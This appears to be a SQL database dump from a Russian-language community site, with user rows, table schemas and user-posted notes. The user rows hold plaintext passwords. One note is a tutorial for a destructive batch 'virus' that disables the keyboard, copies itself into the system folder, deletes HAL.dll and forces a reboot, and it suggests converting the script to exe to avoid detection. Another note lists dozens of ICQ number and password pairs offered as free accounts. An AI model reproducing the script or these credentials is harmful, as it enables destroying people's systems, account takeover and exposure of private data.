INSERT INTO users VALUES("162","genius","formoza5879","","0","","27-07-15","300","10","0","","","625605114","Mozilla/5.0","0","genius","1438024760","error","0","1","15","","1","0","410","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","27/07/15 22:19","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","2","0","","0","0");
INSERT INTO users VALUES("167","konuk","123456a","","0","","29-07-15","300","10","0","","","1048945192","Mozilla/5.0","0","konuk","1438161995","error","0","1","15","","1","0","439","2","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","29/07/15 12:26","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("163","rooter","rooter1","","0","","28-07-15","300","10","0","","","2959606485","Mozilla/5.0","0","rooter","1438149589","index","0","1","15","","1","0","738","0","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","29/07/15 08:59","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
INSERT INTO users VALUES("168","Bizon","plmnko","","0","","29-07-15","300","10","0","","","2365591205","Mozilla/5.0","0","bizon","1438164345","error","0","1","15","","1","0","305","2","","0","5","10","5","5","10","10","5","80","1","1","1","1","1","1","1","1","1","1","1","1","1","0","1","1","1","1","29/07/15 13:05","0","","0","0","0","","0","0","0","0","standart","10","","","","0","","0","0","","0","0");
DROP TABLE IF EXISTS `wall`;
CREATE TABLE `wall` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`komu` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `zametki`;
CREATE TABLE `zametki` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`comm` smallint(2) NOT NULL DEFAULT '0',
`look` smallint(2) NOT NULL DEFAULT '0',
`title` char(100) NOT NULL,
`content` text NOT NULL,
`date` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8;
INSERT INTO zametki VALUES("18","763","0","0","кеееееееееее","еееееееееееееееееееееееееееееееееееееееееееееееееееее","1378222610");
INSERT INTO zametki VALUES("17","4","1","1","защита от ддос","Защищаем сайт от ddos атак(обращений ботов),которые питаются жадно трафиком<br />Внимание,чтобы ваш сайт видел и могли сканировать боты-нужно прописать им(ихним IP) доступ без проверки!<br />----<br />////Вписываем в .htaccess код<br /><br /><br />RewriteCond %{http_cookie} !bb_mode=235274244 <br />#Google <br />RewriteCond %{REMOTE_ADDR} !66.249.0.0/16 <br />#Rambler <br />RewriteCond %{REMOTE_ADDR} !81.19.64.0/24 <br />RewriteCond %{REMOTE_ADDR} !81.19.65.0/24 <br />RewriteCond %{REMOTE_ADDR} !81.19.66.0/24 <br />#Yandex <br />RewriteCond %{REMOTE_ADDR} !77.88.24.0/24 <br />RewriteCond %{REMOTE_ADDR} !77.88.25.0/24 <br />RewriteCond %{REMOTE_ADDR} !77.88.26.0/24 <br />RewriteCond %{REMOTE_ADDR} !77.88.27.0/24 <br />RewriteRule .* redirect.html [L]<br />///Создаем html файл antiddos.html и вписываем туда код<br /><!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" <br />\"http://www.w3.org/TR/html4/loose.dtd\"> <br /><html> <br /><head> <br /><META HTTP-EQUIV=\"CACHE-CONTROL\" CONTENT=\"NO-CACHE\"> <br /><META HTTP-EQUIV=\"PRAGMA\" CONTENT=\"NO-CACHE\"> <br /><META HTTP-EQUIV=\"REFRESH\" CONTENT=\"0;\"> <br /><title></title> <br /></head> <br /><body> <br /><script type=\"text/javascript\"> <br />document.cookie = \'bb_mode=235274244; path=/\'; <br /></script> <br /></body> <br /></html><br />","1377782692");
INSERT INTO zametki VALUES("19","3","1","1","bat "вирус"","всем привет )) будем писать с вами batnik для тех кто не знает что это - выходим на главную )) ну ладно начали ))) <br /> дял начала запрет выходить окошку cmd <br />командой <br />[code]@echo off [/code]<br /> дальше напишем к примеру какую нибудь команду ( для тестирования) <br /> к примеру команда:<br />start explorer(откроет проводник) <br /> и вот окошко cmd не вылезло - значит все нормас ) <br /> теперь напишем какую нибудь серьезную хреновину )) :D <br /> к примеру вот такую команду <br /><br />[code]@echo off<br />rundll32 keyboard,disable[/code]<br /> в этом случае у нашего "врага " отключится клавиатура )) <br /> ну да ладно не остановимся на этом ) <br /> копируемся в системную папку вот такой командой: <br />[code]copy %0 %windir%/system <br />label hackbit[/code]<br /> удачно ! <br /> дальше не много пошутим(совсем не много) <br /> вводим такую команду <br /> [code]label hackbit[/code] <br /> и жесткий диск переименуется в "hackbit"<br /> дальше если вы хотите очень напакостить то вводим такую команду:<br />[code]del %systemroot%\system32\HAL.dll[/code]<br /> советую быть с ней очень осторожной, т.к снос винды обеспечен , <br /> и так дальше чтобы наш "недруг" почувствовал всю силу батника допишем команду перезагрузки компа: <br />[code]@echo off <br />shutdown -r -t 1 -c "lol" >nul[/code]<br /> обьясняю зачем она : как только комп перезагрузится появится черное окошко(снос винды) и все , комп не включится , дальше чтоб нам особо не палится надо из bat сделать exe , вы спросите как же это сделать ?) отвеечаю ! есть одна замечательная программа , bat converter(в зц ) думаю с ней даже новичок справится )) сделали , но перед этим советую подумать головой )) ведь отвечаете только Вы )) <br /> ну думаю обьяснил максимально подробно , всем спасибо за внимание !","1378231064");
INSERT INTO zametki VALUES("20","1","1","1","icq халява","Bсе номера валидны (прочеканы<br />на валид). P.S. если не логиниться<br />какой-то номер на ICQ.COM<br />залогиньтесь через программу и<br />впишите инфу в номер и только<br />затем гоу на ICQ.COM.<br />94555520;XRddzF2j<br />11115108;71Fa5l9i<br />28121812;6cD8LJ1z<br />12217117;C2cK3mU0<br />93666630;i5nBWbZp<br />23020232;PP5Hi9q9<br />44440915;6KN4Qc0j<br />39338888;7H0riLU2<br />55567755;9K3gGD8m<br />20424440;h6JC4rS3<br />76776747;k86K9XbM<br />77187818;I6Cc33cT<br />22008080;B03Occ9P<br />99994028;Pnc78IDH<br />23322326;Q9L84hNg<br />83999925;874VsrNJ<br />26565562;U4TN4o8v<br />33223020;Xs2mT9D0<br />14221242;OR52Tz1t<br />85857577;7Tl8D7Re<br />67787886;7Rq24jKL<br />70222700;62fNRyI2<br />62002666;9BUI5n2s<br />78444460;85aYaG2O<br />11116896;3dkuxo5d<br />38488843;6zPc7FX5<br />95144443;R6REpTLB<br />32888850;XczLSO8P<br />77967997;E47QspG9<br />23732233;8Y6lm9SJ<br />14111135;uF4S7d1L<br />11119827;BKisXF4t<br />15311133;Yu1J2qU6<br />11244445;VYuqbmY0<br />11118982;tKX9CEl4<br />22112214;27GMqa7G<br />17144744;n8YHQ46f<br />44440295;797HHtJj<br />65555028;96jDT7Qz<br />97833337;LPON4IqF<br />20633332;D8Gfu59M<br />40240020;6J2aP0hG<br />17767176;X2Lp01Cu<br />44775457;0MS5y7jH<br />44442725;ohH5LD72<br />44734373;aXP3fN22<br />76227767;uo1Y12UE<br />93743333;bBHIqWP4<br />63676633;Gdm71S3P<br />51111305;lA69N5Jt<br />32333423;3WgT7N6z<br />14419994;mGWQ4y42<br />98777711;UmWXe4lU<br />38683663;0VIfAn29<br />77151177;oBFz3Z17<br />28822855;4VZjh5L5<br />97222231;Myg7vCHU<br />46626442;k8nU1ED6<br />10555577;BvIuiq3b<br />41100411;u2WCCw67<br />44846468;3N6tChV2<br />77907977;4ySVD0z8<br />58568665;L1d26gUP<br />96666920;y32ZfNwQ<br />11119286;ys5zCqsT<br />93655559;p34M2nuf<br />83787387;S8lX1Db1<br />56222665;rU0oSX56<br />22728287;1KO5y8dZ<br />73077070;b9OF7Mm8<br />36635365;779tRDxN<br />33337778;1RKi3L7m<br />11124211;EFwc6X72<br />64946946;7sG0IL2t<br />11116876;k9dTvtLb<br />99991763;mYhDe4LM<br />10862222;YOpo0TEM<br />50015005;u6XH98zC<br />97555535;fStr3NHi<br />86606860;lCyO80E9<br />39969333;0e8C7AaA<br />54433444;Qh89lIP5<br />16766176;9VD9tiH4<br />11677775;2L35DqDR","1378553270");
INSERT INTO zametki VALUES("21","2","1","1","Тест","Тестнр5ш сири ирирй ирй йририрфефдх фшхмфмфшфш","1379429436");